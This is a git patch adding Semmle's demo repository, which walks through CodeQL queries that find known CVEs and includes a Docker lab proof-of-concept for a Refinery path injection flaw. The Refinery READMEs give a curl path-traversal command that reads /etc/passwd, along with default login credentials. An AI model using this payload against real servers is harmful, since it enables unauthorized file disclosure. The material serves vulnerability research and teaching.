From db12b35f102556481702110d634998d44e96885a Mon Sep 17 00:00:00 2001 From: Kevin Backhouse Date: Mon, 28 Jan 2019 15:07:57 +0000 Subject: [PATCH 01/36] Move Semmle demos to github.com --- .gitignore | 2 + LICENSE.md | 13 + NOTICE.md | 2 + README.md | 11 + .../amphtml_PR_integration/README.md | 3 + .../python/Refinery/ExploitPoC/README.md | 69 + .../ExploitPoC/refinery-attacker/Dockerfile | 11 + .../ExploitPoC/refinery-server/Dockerfile | 31 + .../ExploitPoC/refinery-server/diff.txt | 38 + lgtm_demos/python/Refinery/README.md | 11 + ql_demos/.gitignore | 1 + ql_demos/.project | 11 + .../BadOverflowCheck.ql | 13 + .../ChakraCore-bad-overflow-check/README.md | 3 + .../00_copy_from_user.ql | 14 + .../01_copy_from_user_annotated.ql | 31 + .../02_filter_with_upperbound.ql | 29 + .../03_filter_with_upperbound.ql | 32 + .../04_safe_malloc.ql | 36 + ..._filter_with_upperbound_and_safe_malloc.ql | 41 + .../06_stackaddress_dataflow.ql | 46 + .../cpp/Qualcomm-MSM-copy_from_user/README.md | 5 + .../DTraceUnsafeIndex.ql | 52 + .../cpp/XNU_DTrace_CVE-2017-13782/README.md | 5 + .../BCopyNegativeSize.ql | 38 + .../README.md | 5 + .../ArrayIndexMightOverflow.ql | 18 + .../InfiniteLoop.ql | 23 + .../README.md | 13 + .../tcphdr_mbuf_copydata.ql | 32 + .../01_find_colormap_index.ql | 8 + .../02a_find_guarded_colormap_index.ql | 30 + ...02b_find_guarded_colormap_index_working.ql | 40 + .../03_find_unguarded_colormap_index.ql | 46 + .../04_find_unguarded_colormap_no_fps.ql | 130 ++ .../05_find_unguarded_colormap_generalised.ql | 128 ++ ql_demos/cpp/libjpeg-turbo-oob/README.md | 16 + ql_demos/cpp/queries.xml | 1 + .../01_find_snprintf.ql | 14 + .../02_find_snprintf_with_result.ql | 11 + ...03_find_snprintf_with_result_and_string.ql | 15 + ..._with_result_and_string_and_local_taint.ql | 16 + ...th_result_and_string_and_local_taint_ub.ql | 21 + .../cpp/rsyslog_CVE-2018-1000140/README.md | 5 + .../rsyslog_CVE-2018-1000140/Video/README.md | 5 + .../Video/rsyslog.srt | 1200 +++++++++++++++++ ql_demos/java/.qlpath | 10 + .../Apache_Struts_CVE-2017-9805/README.md | 7 + .../UnsafeDeserialization.qll | 79 ++ .../UnsafeDeserializationStruts.ql | 55 + .../01_compileAndExecute.ql | 13 + .../02_compileAndExecute.ql | 12 + .../03_compileAndExecute.ql | 14 + .../04_compileAndExecute.ql | 20 + .../05_getNamespace.ql | 18 + .../06_getNamespace.ql | 20 + .../07_getNamespace.ql | 21 + .../08_getNamespace.ql | 28 + .../09_dataflow.ql | 42 + .../10_dataflow_with_barrier.ql | 50 + .../11_dataflow_with_additional_flow_step.ql | 65 + .../Apache_Struts_CVE-2018-11776/README.md | 14 + ql_demos/java/queries.xml | 1 + .../01_HTTP_handlers.ql | 20 + .../02_getASendMethodCall.ql | 42 + .../03_LikelySendArgument.ql | 51 + .../04_LikelyRequestParameter.ql | 68 + .../Etherpad_CVE-2018-6835/05_DataFlow.ql | 78 ++ .../06_DataFlow_With_Sanitizer.ql | 99 ++ .../Etherpad_CVE-2018-6835/README.md | 5 + ql_demos/javascript/queries.xml | 1 + 71 files changed, 3158 insertions(+) create mode 100644 .gitignore create mode 100644 LICENSE.md create mode 100644 NOTICE.md create mode 100644 README.md create mode 100644 lgtm_demos/javascript/amphtml_PR_integration/README.md create mode 100644 lgtm_demos/python/Refinery/ExploitPoC/README.md create mode 100644 lgtm_demos/python/Refinery/ExploitPoC/refinery-attacker/Dockerfile create mode 100644 lgtm_demos/python/Refinery/ExploitPoC/refinery-server/Dockerfile create mode 100644 lgtm_demos/python/Refinery/ExploitPoC/refinery-server/diff.txt create mode 100644 lgtm_demos/python/Refinery/README.md create mode 100644 ql_demos/.gitignore create mode 100644 ql_demos/.project create mode 100644 ql_demos/cpp/ChakraCore-bad-overflow-check/BadOverflowCheck.ql create mode 100644 ql_demos/cpp/ChakraCore-bad-overflow-check/README.md create mode 100644 ql_demos/cpp/Qualcomm-MSM-copy_from_user/00_copy_from_user.ql create mode 100644 ql_demos/cpp/Qualcomm-MSM-copy_from_user/01_copy_from_user_annotated.ql create mode 100644 ql_demos/cpp/Qualcomm-MSM-copy_from_user/02_filter_with_upperbound.ql create mode 100644 ql_demos/cpp/Qualcomm-MSM-copy_from_user/03_filter_with_upperbound.ql create mode 100644 ql_demos/cpp/Qualcomm-MSM-copy_from_user/04_safe_malloc.ql create mode 100644 ql_demos/cpp/Qualcomm-MSM-copy_from_user/05_filter_with_upperbound_and_safe_malloc.ql create mode 100644 ql_demos/cpp/Qualcomm-MSM-copy_from_user/06_stackaddress_dataflow.ql create mode 100644 ql_demos/cpp/Qualcomm-MSM-copy_from_user/README.md create mode 100644 ql_demos/cpp/XNU_DTrace_CVE-2017-13782/DTraceUnsafeIndex.ql create mode 100644 ql_demos/cpp/XNU_DTrace_CVE-2017-13782/README.md create mode 100644 ql_demos/cpp/XNU_NFS_Boot_CVE-2018-4136_CVE-2018-4160/BCopyNegativeSize.ql create mode 100644 ql_demos/cpp/XNU_NFS_Boot_CVE-2018-4136_CVE-2018-4160/README.md create mode 100644 ql_demos/cpp/XNU_packet-mangler_CVE-2018-4249/ArrayIndexMightOverflow.ql create mode 100644 ql_demos/cpp/XNU_packet-mangler_CVE-2018-4249/InfiniteLoop.ql create mode 100644 ql_demos/cpp/XNU_packet-mangler_CVE-2018-4249/README.md create mode 100644 ql_demos/cpp/XNU_packet-mangler_CVE-2018-4249/tcphdr_mbuf_copydata.ql create mode 100644 ql_demos/cpp/libjpeg-turbo-oob/01_find_colormap_index.ql create mode 100644 ql_demos/cpp/libjpeg-turbo-oob/02a_find_guarded_colormap_index.ql create mode 100644 ql_demos/cpp/libjpeg-turbo-oob/02b_find_guarded_colormap_index_working.ql create mode 100644 ql_demos/cpp/libjpeg-turbo-oob/03_find_unguarded_colormap_index.ql create mode 100644 ql_demos/cpp/libjpeg-turbo-oob/04_find_unguarded_colormap_no_fps.ql create mode 100644 ql_demos/cpp/libjpeg-turbo-oob/05_find_unguarded_colormap_generalised.ql create mode 100644 ql_demos/cpp/libjpeg-turbo-oob/README.md create mode 100644 ql_demos/cpp/queries.xml create mode 100644 ql_demos/cpp/rsyslog_CVE-2018-1000140/01_find_snprintf.ql create mode 100644 ql_demos/cpp/rsyslog_CVE-2018-1000140/02_find_snprintf_with_result.ql create mode 100644 ql_demos/cpp/rsyslog_CVE-2018-1000140/03_find_snprintf_with_result_and_string.ql create mode 100644 ql_demos/cpp/rsyslog_CVE-2018-1000140/04_find_snprintf_with_result_and_string_and_local_taint.ql create mode 100644 ql_demos/cpp/rsyslog_CVE-2018-1000140/05_find_snprintf_with_result_and_string_and_local_taint_ub.ql create mode 100644 ql_demos/cpp/rsyslog_CVE-2018-1000140/README.md create mode 100644 ql_demos/cpp/rsyslog_CVE-2018-1000140/Video/README.md create mode 100644 ql_demos/cpp/rsyslog_CVE-2018-1000140/Video/rsyslog.srt create mode 100644 ql_demos/java/.qlpath create mode 100644 ql_demos/java/Apache_Struts_CVE-2017-9805/README.md create mode 100644 ql_demos/java/Apache_Struts_CVE-2017-9805/UnsafeDeserialization.qll create mode 100644 ql_demos/java/Apache_Struts_CVE-2017-9805/UnsafeDeserializationStruts.ql create mode 100644 ql_demos/java/Apache_Struts_CVE-2018-11776/01_compileAndExecute.ql create mode 100644 ql_demos/java/Apache_Struts_CVE-2018-11776/02_compileAndExecute.ql create mode 100644 ql_demos/java/Apache_Struts_CVE-2018-11776/03_compileAndExecute.ql create mode 100644 ql_demos/java/Apache_Struts_CVE-2018-11776/04_compileAndExecute.ql create mode 100644 ql_demos/java/Apache_Struts_CVE-2018-11776/05_getNamespace.ql create mode 100644 ql_demos/java/Apache_Struts_CVE-2018-11776/06_getNamespace.ql create mode 100644 ql_demos/java/Apache_Struts_CVE-2018-11776/07_getNamespace.ql create mode 100644 ql_demos/java/Apache_Struts_CVE-2018-11776/08_getNamespace.ql create mode 100644 ql_demos/java/Apache_Struts_CVE-2018-11776/09_dataflow.ql create mode 100644 ql_demos/java/Apache_Struts_CVE-2018-11776/10_dataflow_with_barrier.ql create mode 100644 ql_demos/java/Apache_Struts_CVE-2018-11776/11_dataflow_with_additional_flow_step.ql create mode 100644 ql_demos/java/Apache_Struts_CVE-2018-11776/README.md create mode 100644 ql_demos/java/queries.xml create mode 100644 ql_demos/javascript/Etherpad_CVE-2018-6835/01_HTTP_handlers.ql create mode 100644 ql_demos/javascript/Etherpad_CVE-2018-6835/02_getASendMethodCall.ql create mode 100644 ql_demos/javascript/Etherpad_CVE-2018-6835/03_LikelySendArgument.ql create mode 100644 ql_demos/javascript/Etherpad_CVE-2018-6835/04_LikelyRequestParameter.ql create mode 100644 ql_demos/javascript/Etherpad_CVE-2018-6835/05_DataFlow.ql create mode 100644 ql_demos/javascript/Etherpad_CVE-2018-6835/06_DataFlow_With_Sanitizer.ql create mode 100644 ql_demos/javascript/Etherpad_CVE-2018-6835/README.md create mode 100644 ql_demos/javascript/queries.xml diff --git a/.gitignore b/.gitignore new file mode 100644 index 0000000..80e3807 --- /dev/null +++ b/.gitignore @@ -0,0 +1,2 @@ +# emacs backups +*~ diff --git a/LICENSE.md b/LICENSE.md new file mode 100644 index 0000000..db8fd5c --- /dev/null +++ b/LICENSE.md @@ -0,0 +1,13 @@ +Copyright 2019 Semmle Ltd. + +Licensed under the Apache License, Version 2.0 (the "License"); +you may not use this file except in compliance with the License. +You may obtain a copy of the License at + + http://www.apache.org/licenses/LICENSE-2.0 + +Unless required by applicable law or agreed to in writing, software +distributed under the License is distributed on an "AS IS" BASIS, +WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +See the License for the specific language governing permissions and +limitations under the License. diff --git a/NOTICE.md b/NOTICE.md new file mode 100644 index 0000000..cab83e0 --- /dev/null +++ b/NOTICE.md @@ -0,0 +1,2 @@ +## Semmle Demos +Copyright 2019 Semmle Ltd. diff --git a/README.md b/README.md new file mode 100644 index 0000000..819d310 --- /dev/null +++ b/README.md @@ -0,0 +1,11 @@ +# Semmle Demos + +This open source repository contains demos of Semmle's products: QL and LGTM. Many of the demos are examples of security vulnerabilities that were found by a QL query. These demos contain step-by-step instructions on how to build a QL query that finds the vulnerability. + +## How do I run the demos? + +You can use the [interactive query console](https://lgtm.com/help/lgtm/using-query-console) or the [QL for Eclipse](https://lgtm.com/help/lgtm/running-queries-ide) plugin. + +## License + +The demos are licensed under [Apache License 2.0](LICENSE) by [Semmle](https://semmle.com). diff --git a/lgtm_demos/javascript/amphtml_PR_integration/README.md b/lgtm_demos/javascript/amphtml_PR_integration/README.md new file mode 100644 index 0000000..5e76ef4 --- /dev/null +++ b/lgtm_demos/javascript/amphtml_PR_integration/README.md @@ -0,0 +1,3 @@ +# AMP HTML pull-request integration + +[Pull Request #13060](https://github.com/ampproject/amphtml/pull/13060) is a great example of LGTM's pull-request integration feature. In this pull request, [@lannka](https://github.com/lannka) wants to revert a change made by [@rsimha](https://github.com/rsimha) because it "breaks the regex". Within 15 minutes, LGTM posted a [comment](https://github.com/ampproject/amphtml/pull/13060#issuecomment-360860032) on the pull request, saying that it introduces a new alert for "Regular expression injection". As [@rsimha](https://github.com/rsimha) explains in the next [comment](https://github.com/ampproject/amphtml/pull/13060#issuecomment-360865628), he changed the regular expression to fix a security vulnerability. This pull request was going to reintroduce the vulnerability! Luckily, LGTM caught the problem quickly and the pull request was fixed before it got merged. diff --git a/lgtm_demos/python/Refinery/ExploitPoC/README.md b/lgtm_demos/python/Refinery/ExploitPoC/README.md new file mode 100644 index 0000000..23f9027 --- /dev/null +++ b/lgtm_demos/python/Refinery/ExploitPoC/README.md @@ -0,0 +1,69 @@ +# Path injection in Refinery + +This directory contains a proof-of-concept exploit for a path injection vulnerability in [Refinery](https://github.com/daeilkim/refinery). + +To demonstrate the PoC in a safe environment, we will use two docker containers connected by a docker network bridge to simulate two separate computers: the first is the Refinery server and the second is the attacker's computer. + +We have tried to make the `Dockerfile`'s for the server and attacker as simple as possible, to make it clear that we have used vanilla [Ubuntu 18.04](http://releases.ubuntu.com/18.04/) with no unusual packages installed. + +## Network setup + +Create a docker network bridge, to simulate a network with two separate computers. + +```bash +docker network create -d bridge --subnet 172.18.0.0/16 refinery-demo-network +``` + +## Refinery server setup + +Build the docker image: + +```bash +cd refinery-server +docker build . -t refinery-server --build-arg UID=`id -u` +``` + +Start the container: + +```bash +docker run --rm --network refinery-demo-network --ip=172.18.0.10 -h refinery-server --publish 8080:8080 -i -t refinery-server +``` + +Inside the container, start postgresql and Refinery. + +```bash +sudo service postgresql start # sudo password is "x" +sudo -u postgres createuser --superuser victim +sudo -u postgres createdb refinery +cd refinery/refinery +./reset_db.py +./start_refinery.sh +``` + +At this point, you can check that Refinery is running by visiting [http://127.0.0.1:8080](http://127.0.0.1:8080) in your browser. (We exposed port 8080 on the docker container.) You should see a login screen. These are the default credentials: + +``` +username: doc +password: refinery +``` + +## Attacker setup + +Build the docker image: + +```bash +cd refinery-attacker +docker build . -t refinery-attacker +``` + +Start the container: + +```bash +docker run --rm --network refinery-demo-network --ip=172.18.0.11 -h refinery-attacker -i -t refinery-attacker +``` + +Inside the container, use `curl` to read arbitrary files on the server: + +```bash +curl -d "filename=../../../../../../../../../../../../../../etc/passwd" -X POST http://172.18.0.10:8080/doc/get_doc_text +``` diff --git a/lgtm_demos/python/Refinery/ExploitPoC/refinery-attacker/Dockerfile b/lgtm_demos/python/Refinery/ExploitPoC/refinery-attacker/Dockerfile new file mode 100644 index 0000000..0745e0c --- /dev/null +++ b/lgtm_demos/python/Refinery/ExploitPoC/refinery-attacker/Dockerfile @@ -0,0 +1,11 @@ +FROM ubuntu:bionic + +RUN apt-get update && \ + apt-get install -y curl + +# Create user account for the attacker. +RUN adduser attacker --disabled-password + +# Switch over to the 'attacker' user, since root access is no longer required +USER attacker +WORKDIR /home/attacker diff --git a/lgtm_demos/python/Refinery/ExploitPoC/refinery-server/Dockerfile b/lgtm_demos/python/Refinery/ExploitPoC/refinery-server/Dockerfile new file mode 100644 index 0000000..698be3d --- /dev/null +++ b/lgtm_demos/python/Refinery/ExploitPoC/refinery-server/Dockerfile @@ -0,0 +1,31 @@ +FROM ubuntu:bionic + +RUN echo "Etc/UTC" > /etc/timezone +ENV DEBIAN_FRONTEND=noninteractive + +RUN apt-get update && \ + apt-get install -y git python-pip postgresql redis-server gunicorn sudo + +ARG UID=1000 + +# Create a non-root user account to run Refinery. +RUN adduser victim --disabled-password --uid $UID + +# Grant the 'victim' user sudo access, so that we can start postgresql. +RUN adduser victim sudo +RUN echo "victim:x" | chpasswd + +# Switch over to the 'victim' user, since root access is no longer required +USER victim +WORKDIR /home/victim + +# Some of the Python module names have changed since the Refinery code +# was written, so we have to apply a simple patch. +COPY diff.txt /home/victim/diff.txt + +# Get Refinery source code and check out the vulnerable version. +RUN git clone https://github.com/daeilkim/refinery && cd refinery && \ + git checkout 0d5de8fc3d680a2c79bd0e9384b506229787c74f && \ + git apply /home/victim/diff.txt + +RUN pip install flask flask_login flask_sqlalchemy flask_wtf celery joblib psycopg2 redis scipy diff --git a/lgtm_demos/python/Refinery/ExploitPoC/refinery-server/diff.txt b/lgtm_demos/python/Refinery/ExploitPoC/refinery-server/diff.txt new file mode 100644 index 0000000..74cc4e5 --- /dev/null +++ b/lgtm_demos/python/Refinery/ExploitPoC/refinery-server/diff.txt @@ -0,0 +1,38 @@ +diff --git a/refinery/refinery/__init__.py b/refinery/refinery/__init__.py +index 3bd6a8b..4ad1311 100644 +--- a/refinery/refinery/__init__.py ++++ b/refinery/refinery/__init__.py +@@ -1,6 +1,6 @@ + from flask import Flask +-from flask.ext.sqlalchemy import SQLAlchemy +-from flask.ext.login import LoginManager ++from flask_sqlalchemy import SQLAlchemy ++from flask_login import LoginManager + from celery import Celery + + print "Opening a Refinery" +diff --git a/refinery/refinery/webapp/admin.py b/refinery/refinery/webapp/admin.py +index e6d26d4..23af1dd 100644 +--- a/refinery/refinery/webapp/admin.py ++++ b/refinery/refinery/webapp/admin.py +@@ -1,6 +1,6 @@ + from flask import g, redirect, render_template, session, url_for, flash #url_for, abort, render_template, flash, send_from_directory, jsonify, Response, json + from refinery import app, lm +-from flask.ext.login import login_user, logout_user, login_required ++from flask_login import login_user, logout_user, login_required + from refinery.data.models import User + from flask_wtf import Form + from wtforms import TextField, PasswordField, BooleanField +diff --git a/refinery/refinery/webapp/main_menu.py b/refinery/refinery/webapp/main_menu.py +index 670c62e..6e5ca7f 100644 +--- a/refinery/refinery/webapp/main_menu.py ++++ b/refinery/refinery/webapp/main_menu.py +@@ -14,7 +14,7 @@ Or else what? Exactly. + """ + + from flask import request, g, render_template, jsonify, Response, json +-from flask.ext.login import current_user,login_required ++from flask_login import current_user,login_required + + import celery + diff --git a/lgtm_demos/python/Refinery/README.md b/lgtm_demos/python/Refinery/README.md new file mode 100644 index 0000000..9fd9b22 --- /dev/null +++ b/lgtm_demos/python/Refinery/README.md @@ -0,0 +1,11 @@ +# Path injection in Refinery + +One of LGTM's default queries found a path injection vulnerability in the open source [Refinery](https://github.com/daeilkim/refinery) project: + +https://lgtm.com/projects/g/daeilkim/refinery/snapshot/5eb10ae26cc67ac3d39d37e932274798631e15b2/files/refinery/refinery/webapp/topicmodel.py#xaea6e729c50ca7a5:1 + +This bug is trivial to exploit. If Refinery is running on the website example.com, then an attacker can read arbitrary files on the server like this: + +curl -d "filename=../../../../../../../../../../../../etc/passwd" -X POST http://example.com/doc/get_doc_text + +Semmle reported this vulnerability to the maintainers of Refinery on 2018-12-16 (using the email addresses listed [here](https://github.com/daeilkim/refinery/blob/0d5de8fc3d680a2c79bd0e9384b506229787c74f/README.md)), but they did not respond. Kevin Backhouse also attempted to contact Daeil Kim using [LinkedIn](https://www.linkedin.com/in/daeil/), but did not receive a response. diff --git a/ql_demos/.gitignore b/ql_demos/.gitignore new file mode 100644 index 0000000..c3ed10e --- /dev/null +++ b/ql_demos/.gitignore @@ -0,0 +1 @@ +*.cache diff --git a/ql_demos/.project b/ql_demos/.project new file mode 100644 index 0000000..334c851 --- /dev/null +++ b/ql_demos/.project @@ -0,0 +1,11 @@ + + + QL Demos + + + + + + + + diff --git a/ql_demos/cpp/ChakraCore-bad-overflow-check/BadOverflowCheck.ql b/ql_demos/cpp/ChakraCore-bad-overflow-check/BadOverflowCheck.ql new file mode 100644 index 0000000..35b393d --- /dev/null +++ b/ql_demos/cpp/ChakraCore-bad-overflow-check/BadOverflowCheck.ql @@ -0,0 +1,13 @@ +import cpp + +predicate isSmall(Expr e) { + e.getType().getSize() < 4 +} + +from AddExpr a, Variable v, RelationalOperation cmp +where a.getAnOperand() = v.getAnAccess() + and cmp.getAnOperand() = a + and cmp.getAnOperand() = v.getAnAccess() + and forall(Expr op | op = a.getAnOperand() | isSmall(op)) + and not isSmall(a.getExplicitlyConverted()) +select cmp, "Bad overflow check" diff --git a/ql_demos/cpp/ChakraCore-bad-overflow-check/README.md b/ql_demos/cpp/ChakraCore-bad-overflow-check/README.md new file mode 100644 index 0000000..8097be5 --- /dev/null +++ b/ql_demos/cpp/ChakraCore-bad-overflow-check/README.md @@ -0,0 +1,3 @@ +Use [this snapshot](https://downloads.lgtm.com/snapshots/cpp/microsoft/chakracore/ChakraCore-revision-2017-April-12--18-13-26.zip) + +We now also have this query in our default suite: https://lgtm.com/rules/2156560627/ diff --git a/ql_demos/cpp/Qualcomm-MSM-copy_from_user/00_copy_from_user.ql b/ql_demos/cpp/Qualcomm-MSM-copy_from_user/00_copy_from_user.ql new file mode 100644 index 0000000..a586401 --- /dev/null +++ b/ql_demos/cpp/Qualcomm-MSM-copy_from_user/00_copy_from_user.ql @@ -0,0 +1,14 @@ +/** + * @name Calls to copy_from_user + * @description Find all calls to copy from user. + * @problem.severity warning + */ + +import cpp +import semmle.code.cpp.rangeanalysis.SimpleRangeAnalysis + +// This first query is essentially equivalent to `grep -r copy_from_user`. +// It has almost 1300 results. +from FunctionCall call +where call.getTarget().getName() = "copy_from_user" +select call diff --git a/ql_demos/cpp/Qualcomm-MSM-copy_from_user/01_copy_from_user_annotated.ql b/ql_demos/cpp/Qualcomm-MSM-copy_from_user/01_copy_from_user_annotated.ql new file mode 100644 index 0000000..cb40164 --- /dev/null +++ b/ql_demos/cpp/Qualcomm-MSM-copy_from_user/01_copy_from_user_annotated.ql @@ -0,0 +1,31 @@ +/** + * @name Filter with upper bound + * @description This query excludes results that are + * safe because the upper bound of the size argument + * is less than or equal to the size of the destination + * buffer. + * @problem.severity warning + */ + +import cpp +import semmle.code.cpp.rangeanalysis.SimpleRangeAnalysis + +// Let's add some extra columns, so that we can see a bit more information +// about the calls to copy_from_user. +// +// This shows that there are two fairly common patterns: +// 1. copy_from_user into a statically sized buffer, and the +// upper bound of `sizeArg` shows that it is safe. +// 2. copy_from_user into a buffer that was allocated with kzalloc, +// and the size argument of the kzalloc is the same as the +// size argument of copy_from_user. These calls are safe. +from FunctionCall call, Expr destArg, Expr sizeArg +where call.getTarget().getName() = "copy_from_user" +and destArg = call.getArgument(0) +and sizeArg = call.getArgument(2) +select + call, + destArg.getType(), + lowerBound(sizeArg), + upperBound(sizeArg), + call.getFile().getRelativePath() diff --git a/ql_demos/cpp/Qualcomm-MSM-copy_from_user/02_filter_with_upperbound.ql b/ql_demos/cpp/Qualcomm-MSM-copy_from_user/02_filter_with_upperbound.ql new file mode 100644 index 0000000..5c35aa3 --- /dev/null +++ b/ql_demos/cpp/Qualcomm-MSM-copy_from_user/02_filter_with_upperbound.ql @@ -0,0 +1,29 @@ +/** + * @name Filter with upper bound + * @description This query excludes results that are + * safe because the upper bound of the size argument + * is less than or equal to the size of the destination + * buffer. + * @problem.severity warning + */ + +import cpp +import semmle.code.cpp.rangeanalysis.SimpleRangeAnalysis + +// Let's exclude filter out results that look like this: +// +// ``` +// struct MyStruct s; +// copy_from_user(&s, usrptr, sizeof(s)); +// ``` +from FunctionCall call, Expr destArg, Expr sizeArg +where call.getTarget().getName() = "copy_from_user" +and destArg = call.getArgument(0) +and sizeArg = call.getArgument(2) +and not (destArg.getType().(PointerType).getBaseType().getSize() >= upperBound(sizeArg)) +select + call, + destArg.getType(), + lowerBound(sizeArg), + upperBound(sizeArg), + call.getFile().getRelativePath() diff --git a/ql_demos/cpp/Qualcomm-MSM-copy_from_user/03_filter_with_upperbound.ql b/ql_demos/cpp/Qualcomm-MSM-copy_from_user/03_filter_with_upperbound.ql new file mode 100644 index 0000000..2380693 --- /dev/null +++ b/ql_demos/cpp/Qualcomm-MSM-copy_from_user/03_filter_with_upperbound.ql @@ -0,0 +1,32 @@ +/** + * @name Filter with upper bound + * @description This query excludes results that are + * safe because the upper bound of the size argument + * is less than or equal to the size of the destination + * buffer. + * @problem.severity warning + */ + +import cpp +import semmle.code.cpp.rangeanalysis.SimpleRangeAnalysis + +// It turns out that the filter in the previous query does +// not work for array types, so let's add a second filter which +// excludes examples like this: +// +// ``` +// struct MyStruct s[2]; +// copy_from_user(s, usrptr, sizeof(s)); +// ``` +from FunctionCall call, Expr destArg, Expr sizeArg +where call.getTarget().getName() = "copy_from_user" +and destArg = call.getArgument(0) +and sizeArg = call.getArgument(2) +and not (destArg.getType().(PointerType).getBaseType().getSize() >= upperBound(sizeArg)) +and not (destArg.getType().(ArrayType).getSize() >= upperBound(sizeArg)) +select + call, + destArg.getType(), + lowerBound(sizeArg), + upperBound(sizeArg), + call.getFile().getRelativePath() diff --git a/ql_demos/cpp/Qualcomm-MSM-copy_from_user/04_safe_malloc.ql b/ql_demos/cpp/Qualcomm-MSM-copy_from_user/04_safe_malloc.ql new file mode 100644 index 0000000..e023bf2 --- /dev/null +++ b/ql_demos/cpp/Qualcomm-MSM-copy_from_user/04_safe_malloc.ql @@ -0,0 +1,36 @@ +/** + * @name SafeMalloc + * @description If the copy_from_user is preceded by a kzalloc of + * the correct size, then it is safe. + * @problem.severity warning + */ + +import cpp +import semmle.code.cpp.valuenumbering.GlobalValueNumbering +import semmle.code.cpp.dataflow.TaintTracking +import DataFlow + +// Let's see if we can detect this pattern: +// +// ``` +// buf = kzalloc(size, GFP_KERNEL); +// ... +// copy_from_user(buf, usrptr, size); +// ``` +// +// In the next query, we'll use `safe_malloc` to filter those +// calls out, because they are safe. +predicate safe_malloc(FunctionCall allocCall, FunctionCall copy_from_user) { + exists (DataFlow::Node source, DataFlow::Node sink + | allocCall.getTarget().getName() = "kzalloc" and + copy_from_user.getTarget().getName() = "copy_from_user" and + source.asExpr() = allocCall and + sink.asExpr() = copy_from_user.getArgument(0) and + localFlow(source, sink) and + globalValueNumber(allocCall.getArgument(0)) = + globalValueNumber(copy_from_user.getArgument(2))) +} + +from FunctionCall allocCall, FunctionCall copy_from_user +where safe_malloc(allocCall, copy_from_user) +select allocCall, copy_from_user diff --git a/ql_demos/cpp/Qualcomm-MSM-copy_from_user/05_filter_with_upperbound_and_safe_malloc.ql b/ql_demos/cpp/Qualcomm-MSM-copy_from_user/05_filter_with_upperbound_and_safe_malloc.ql new file mode 100644 index 0000000..bafb293 --- /dev/null +++ b/ql_demos/cpp/Qualcomm-MSM-copy_from_user/05_filter_with_upperbound_and_safe_malloc.ql @@ -0,0 +1,41 @@ +/** + * @name Filter with upper bound + * @description This query excludes results that are + * safe because the upper bound of the size argument + * is less than or equal to the size of the destination + * buffer. + * @problem.severity warning + */ + +import cpp +import semmle.code.cpp.rangeanalysis.SimpleRangeAnalysis +import semmle.code.cpp.valuenumbering.GlobalValueNumbering +import semmle.code.cpp.dataflow.TaintTracking +import DataFlow + +// We wrote this predicate in the previous query. +predicate safe_malloc(FunctionCall allocCall, FunctionCall copy_from_user) { + exists (DataFlow::Node source, DataFlow::Node sink + | allocCall.getTarget().getName() = "kzalloc" and + copy_from_user.getTarget().getName() = "copy_from_user" and + source.asExpr() = allocCall and + sink.asExpr() = copy_from_user.getArgument(0) and + localFlow(source, sink) and + globalValueNumber(allocCall.getArgument(0)) = + globalValueNumber(copy_from_user.getArgument(2))) +} + +// Add a filter to remove results that match the `safe_malloc` pattern. +from FunctionCall call, Expr destArg, Expr sizeArg +where call.getTarget().getName() = "copy_from_user" +and destArg = call.getArgument(0) +and sizeArg = call.getArgument(2) +and not (destArg.getType().(PointerType).getBaseType().getSize() >= upperBound(sizeArg)) +and not (destArg.getType().(ArrayType).getSize() >= upperBound(sizeArg)) +and not safe_malloc(_, call) +select + call, + destArg.getType(), + lowerBound(sizeArg), + upperBound(sizeArg), + call.getFile().getRelativePath() diff --git a/ql_demos/cpp/Qualcomm-MSM-copy_from_user/06_stackaddress_dataflow.ql b/ql_demos/cpp/Qualcomm-MSM-copy_from_user/06_stackaddress_dataflow.ql new file mode 100644 index 0000000..b6b45f1 --- /dev/null +++ b/ql_demos/cpp/Qualcomm-MSM-copy_from_user/06_stackaddress_dataflow.ql @@ -0,0 +1,46 @@ +/** + * @name Stack address dataflow + * @description This query excludes results that are + * safe because the upper bound of the size argument + * is less than or equal to the size of the destination + * buffer. + * @kind path-problem + * @problem.severity warning + */ + +import cpp +import semmle.code.cpp.rangeanalysis.SimpleRangeAnalysis +import semmle.code.cpp.valuenumbering.GlobalValueNumbering +import semmle.code.cpp.dataflow.TaintTracking +import DataFlow +import DataFlow::PathGraph + +class Config extends DataFlow::Configuration { + Config() { this = "copy_from_user" } + + override predicate isSource(DataFlow::Node source) { + exists (LocalVariable v + | source.asExpr().(AddressOfExpr).getOperand() = v.getAnAccess()) + } + + override predicate isSink(DataFlow::Node sink) { + // This is the logic that was previously in the select clause of the query. + exists (FunctionCall call, Expr destArg, Expr sizeArg + | call.getTarget().getName() = "copy_from_user" and + destArg = sink.asExpr() and + destArg = call.getArgument(0) and + sizeArg = call.getArgument(2) and + not (destArg.getType().(PointerType).getBaseType().getSize() >= upperBound(sizeArg)) and + not (destArg.getType().(ArrayType).getSize() >= upperBound(sizeArg))) + } +} + +// This query looks specifically for cases where the address of a local +// variable is used as the target address of the `copy_from_user`. It also +// uses the DataFlow library, so that you can use the path viewer to see +// where the stack address comes from. +// +// The vulnerabilities are the final two results in `msm_cpp.c`. +from Config cfg, DataFlow::PathNode source, DataFlow::PathNode sink +where cfg.hasFlowPath(source, sink) +select sink, source, sink, "possibly unsafe copy_from_user" diff --git a/ql_demos/cpp/Qualcomm-MSM-copy_from_user/README.md b/ql_demos/cpp/Qualcomm-MSM-copy_from_user/README.md new file mode 100644 index 0000000..545706d --- /dev/null +++ b/ql_demos/cpp/Qualcomm-MSM-copy_from_user/README.md @@ -0,0 +1,5 @@ +[Blog post](https://lgtm.com/blog/qualcomm_copy_from_user) + +[Snapshot for this demo](https://downloads.lgtm.com/snapshots/cpp/qualcomm/msm/msm-4.4-revision-2017-May-07--08-33-56.zip) + +The blog post was written before we had the C++ dataflow library, so these demo queries are a bit different than the blog post. diff --git a/ql_demos/cpp/XNU_DTrace_CVE-2017-13782/DTraceUnsafeIndex.ql b/ql_demos/cpp/XNU_DTrace_CVE-2017-13782/DTraceUnsafeIndex.ql new file mode 100644 index 0000000..73b2f21 --- /dev/null +++ b/ql_demos/cpp/XNU_DTrace_CVE-2017-13782/DTraceUnsafeIndex.ql @@ -0,0 +1,52 @@ +/** + * @name DTrace unsafe index + * @description DTrace registers are user-controllable, so they must not be + * used to index an array without a bounds check. + * @kind path-problem + * @problem.severity warning + * @id apple-xnu/cpp/dtrace-unsafe-index + */ + +import cpp +import semmle.code.cpp.dataflow.DataFlow +import DataFlow::PathGraph + +class RegisterAccess extends ArrayExpr { + RegisterAccess() { + exists (LocalScopeVariable regs, Function 